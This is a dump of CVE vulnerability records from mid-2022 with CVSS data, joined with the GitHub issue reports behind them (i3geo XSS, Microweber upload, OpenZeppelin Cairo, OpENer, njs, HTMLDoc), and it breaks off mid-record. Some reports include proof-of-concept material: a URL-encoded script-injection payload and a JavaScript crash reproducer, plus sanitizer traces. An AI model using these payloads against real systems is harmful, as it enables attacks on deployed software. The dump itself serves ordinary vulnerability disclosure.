[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "ADD2D314-E4BD-4399-BC3E-9BDC7A780477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/edmarmoretti/i3geo/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "edmarmoretti", "i3geo" ]
Boa tarde A vulnerabilidade em questão está no arquivo access_token.php. O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: http://.../i3geo/pacotes/linkedinoauth/example/access_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!-- Desde já agradeço a atenção. Wagner Drachinski [wagner.dracha@gmail.com](mailto:wagner.dracha@gmail.com)
Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - access_token.php
https://api.github.com/repos/edmarmoretti/i3geo/issues/4/comments
0
2022-06-14T10:57:19Z
2022-06-14T10:57:19Z
https://github.com/edmarmoretti/i3geo/issues/4
1,270,624,553
4
3,843
CVE-2022-34094
2022-07-14T22:15:09.083
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/edmarmoretti/i3geo/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saladesituacao/i3geo/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L65" }, { "source": "cve@mitre.org", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://softwarepublico.gov.br/social/i3geo" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/edmarmoretti/i3geo/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/saladesituacao/i3geo/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L65" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/xss/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://softwarepublico.gov.br/social/i3geo" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "ADD2D314-E4BD-4399-BC3E-9BDC7A780477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/edmarmoretti/i3geo/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "edmarmoretti", "i3geo" ]
Boa tarde A vulnerabilidade em questão está no arquivo request_token.php. O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: http://.../i3geo/pacotes/linkedinoauth/example/request_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!-- Desde já agradeço a atenção. Wagner Drachinski [wagner.dracha@gmail.com](mailto:wagner.dracha@gmail.com)
Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - request_token.php
https://api.github.com/repos/edmarmoretti/i3geo/issues/5/comments
0
2022-06-14T10:57:53Z
2022-06-14T10:57:53Z
https://github.com/edmarmoretti/i3geo/issues/5
1,270,625,144
5
3,844
CVE-2021-36461
2022-07-15T12:15:08.677
An Arbitrary File Upload vulnerability exists in Microweber 1.1.3 that allows attackers to getshell via the Settings Upload Picture section by uploading pictures with malicious code, user.ini.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/microweber/microweber/issues/751" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/microweber/microweber/issues/751" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:microweber:microweber:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "26B5B517-157A-416A-8816-98EAC6FBA01B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/microweber/microweber/issues/751
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "microweber", "microweber" ]
[microweber Background file upload getshell.pdf](https://github.com/microweber/microweber/files/6719464/microweber.Background.file.upload.getshell.pdf) This pdf file describes the vulnerability in detail
microweber1.1.3 has background upload getshell
https://api.github.com/repos/microweber/microweber/issues/751/comments
1
2021-06-26T02:24:23Z
2021-06-29T11:24:19Z
https://github.com/microweber/microweber/issues/751
930,595,970
751
3,845
CVE-2022-31153
2022-07-15T18:15:08.760
OpenZeppelin Contracts for Cairo is a library for contract development written in Cairo for StarkNet, a decentralized ZK Rollup. Version 0.2.0 is vulnerable to an error that renders account contracts unusable on live networks. This issue affects all accounts (vanilla and ethereum flavors) in the v0.2.0 release of OpenZeppelin Contracts for Cairo, which are not whitelisted on StarkNet mainnet. Only goerli deployments of v0.2.0 accounts are affected. This faulty behavior is not observed in StarkNet's testing framework. This bug has been patched in v0.2.1.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/blob/release-0.2.0/src/openzeppelin/account/library.cairo#L203" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/commit/2cd60279c3332285d47edf9ee3888b71257acdc9" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/issues/386" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/pull/387" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/releases/tag/v0.2.1" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/security/advisories/GHSA-8mjr-jr5h-q2xr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/blob/release-0.2.0/src/openzeppelin/account/library.cairo#L203" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/commit/2cd60279c3332285d47edf9ee3888b71257acdc9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/issues/386" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/pull/387" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/releases/tag/v0.2.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenZeppelin/cairo-contracts/security/advisories/GHSA-8mjr-jr5h-q2xr" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openzeppelin:contracts:0.2.0:*:*:*:*:cairo:*:*", "matchCriteriaId": "49289387-3C88-4D7E-9B63-73CFC6729EB5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/OpenZeppelin/cairo-contracts/issues/386
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OpenZeppelin", "cairo-contracts" ]
Transactions on goerli fail with the following error message: ``` 🛑 The transaction was rejected but no contract address was identified in the error message. Error message: Error at pc=0:133: Got an exception while executing a hint. Cairo traceback (most recent call last): Unknown location (pc=0:746) Unknown location (pc=0:682) Error message: Account: invalid signature Unknown location (pc=0:347) Unknown location (pc=0:321) Traceback (most recent call last): File "<hint14>", line 1, in <module> File "/app/src/starkware/starknet/services/batcher/starknet_batcher_venv-site/starkware/cairo/lang/builtins/signature/signature_builtin_runner.py", line 94, in add_signature ), f"Signature hint must point to the signature builtin segment, not {addr}." AssertionError: Signature hint must point to the signature builtin segment, not 14:0. ``` Neither the StarkNet test environment nor the devnet raise this error. The error stems from here: https://github.com/OpenZeppelin/cairo-contracts/blob/release-0.2.0/src/openzeppelin/account/library.cairo#L203 ``` let (local ecdsa_ptr : SignatureBuiltin*) = alloc() ``` The Signature hint points to this reference (which the [SignatureBuiltinRunner](https://github.com/starkware-libs/cairo-lang/blob/master/src/starkware/cairo/lang/builtins/signature/signature_builtin_runner.py#L85-L95) does not like). To resolve this, I suggest adding the `ecdsa_ptr: SignatureBuiltin*` as an implicit arg to `execute`, `eth_execute`, and `_unsafe_execute` in the Account library and EthAccount's `__execute__` as well. Another solution would be to isolate the functionality of both accounts (thus removing `_unsafe_execute`), so we don't have to pass the implicit `ecdsa_ptr` in the EthAccount methods.
`ecdsa_ptr` points to reference in Account lib's `execute`
https://api.github.com/repos/OpenZeppelin/cairo-contracts/issues/386/comments
0
2022-07-10T00:00:12Z
2024-03-29T13:26:38Z
https://github.com/OpenZeppelin/cairo-contracts/issues/386
1,299,789,749
386
3,846
CVE-2022-32434
2022-07-15T21:15:08.783
EIPStackGroup OpENer v2.3.0 was discovered to contain a stack overflow via /bin/posix/src/ports/POSIX/OpENer+0x56073d.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/EIPStackGroup/OpENer/issues/374" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WaterDemo/ProtocolBugs/tree/main/bug" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/EIPStackGroup/OpENer/issues/374" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WaterDemo/ProtocolBugs/tree/main/bug" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opener_project:opener:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "6672F381-CA65-4595-BD10-AC6B9DED4809", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/EIPStackGroup/OpENer/issues/374
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "EIPStackGroup", "OpENer" ]
Hi, there is a stack overflow bug in OpENer, which is found by fuzzing. It can be reproduced by the poc.zip attached (by using `send_testcase.py` script and poc.zip is assumed to be unziped). [poc.zip](https://github.com/EIPStackGroup/OpENer/files/8818829/poc.zip) Here is the message output by AddressSanitizer: ==210407==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffa249f590 at pc 0x00000056073e bp 0x7fffa249e890 sp 0x7fffa249e888 READ of size 1 at 0x7fffa249f590 thread T0 #0 0x56073d (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x56073d) #1 0x536d27 (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x536d27) #2 0x52e8ab (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x52e8ab) #3 0x54da0c (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x54da0c) #4 0x558400 (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x558400) #5 0x55d6b0 (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x55d6b0) #6 0x55c5d7 (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x55c5d7) #7 0x5688eb (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x5688eb) #8 0x56638b (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x56638b) #9 0x52e24e (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x52e24e) #10 0x52e0ed (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x52e0ed) #11 0x7f904081e0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #12 0x42750d (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x42750d) Address 0x7fffa249f590 is located in stack of thread T0 at offset 560 in frame #0 0x567fcf (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x567fcf) This frame has 7 object(s): [32, 36) 'remaining_bytes' [48, 560) 'incoming_message' <== Memory access at offset 560 overflows this variable [624, 632) 'read_buffer' [656, 672) 'sender_address' [688, 692) 'fromlen' [704, 712) 'agg.tmp' [736, 1264) 'outgoing_message' HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/OpENer/bin/posix/src/ports/POSIX/OpENer+0x56073d) Shadow bytes around the buggy address: 0x10007448be60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10007448be70: 04 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007448be80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007448be90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007448bea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007448beb0: 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00 0x10007448bec0: f2 f2 04 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00 0x10007448bed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007448bee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007448bef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007448bf00: 00 00 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==210407==ABORTING
A stackoverflow bug
https://api.github.com/repos/EIPStackGroup/OpENer/issues/374/comments
3
2022-06-01T21:19:21Z
2022-07-16T08:07:58Z
https://github.com/EIPStackGroup/OpENer/issues/374
1,257,065,949
374
3,847
CVE-2022-34029
2022-07-18T21:15:07.910
Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/506" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/506" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:0.7.4:*:*:*:*:*:*:*", "matchCriteriaId": "A12FD5A4-6946-49DD-95D4-154A8DA98F7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nginx/njs/issues/506
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Environment ```OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 9f4ebc96148308a8ce12f2b54432c87e6d78b881 Version : 0.7.4 Build : ./configure --cc=clang --address-sanitizer=YES make ``` Proof of concept ```js // Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360 function placeholder(){} function main() { function v0(v1,v2,v3,v4,...v5) { try { async function v7(v8,v9,v10,v11) { var v12 = await Proxy; } var v13 = v0(); } catch(v14) { } finally { } var v15 = {}; var v16 = /gL8?/; var v17 = {}; var v18 = [v15,v17,v16]; function v20(v21) { v18[1866532165] = Map; } async function v24(v25,v26) { var v27 = await Map; } function v28(v29,v30) { } var v32 = new Promise(v28); var v34 = v32["catch"](); var v37 = {"get":Promise,"set":v24}; var v38 = Object.defineProperty(v34,"constructor",v37); async function v39(v40,v41) { var v42 = await v38; } var v43 = v39(); var v44 = v20(Map); } var v45 = v0(); } main(); ``` Minified ```js function run_then() {} function f(n) { if (n == 2) { return; } try { f(n + 1); } catch(e) { } var p = new Promise(run_then); Object.defineProperty(p, "constructor", {get: () => ({}).a.a}); async function g() { await p; } g(); throw 'QQ'; } f(0); ``` Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0) ==815==The signal is caused by a READ memory access. ==815==Hint: address points to the zero page. #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13 #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13 #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11 #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19 #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11 #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15 #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee) #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value ==815==ABORTING ``` Credit dramthy(@topsec alpha)
SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value
https://api.github.com/repos/nginx/njs/issues/506/comments
2
2022-05-30T02:09:28Z
2022-06-02T23:34:07Z
https://github.com/nginx/njs/issues/506
1,252,090,775
506
3,848
CVE-2022-34033
2022-07-18T21:15:08.083
HTMLDoc v1.9.15 was discovered to contain a heap overflow via (write_header) /htmldoc/htmldoc/html.cxx:273.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/a0014be47d614220db111b360fb6170ef6f3937e" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ee778252faebb721afba5a081dd6ad7eaf20eef3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/425" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/a0014be47d614220db111b360fb6170ef6f3937e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ee778252faebb721afba5a081dd6ad7eaf20eef3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/425" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.15:*:*:*:*:*:*:*", "matchCriteriaId": "7FA48CA3-3C4E-46CA-8B5E-FDBF99FDD55F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/425
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
AddressSanitizer: heap-buffer-overflow on (write_header) /htmldoc/htmldoc/html.cxx:273
https://api.github.com/repos/michaelrsweet/htmldoc/issues/425/comments
3
2021-05-06T02:08:38Z
2021-05-07T10:37:41Z
https://github.com/michaelrsweet/htmldoc/issues/425
877,005,444
425
3,849
CVE-2022-34035
2022-07-18T21:15:08.127
HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/a0014be47d614220db111b360fb6170ef6f3937e" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ee778252faebb721afba5a081dd6ad7eaf20eef3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/426" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/a0014be47d614220db111b360fb6170ef6f3937e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ee778252faebb721afba5a081dd6ad7eaf20eef3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party 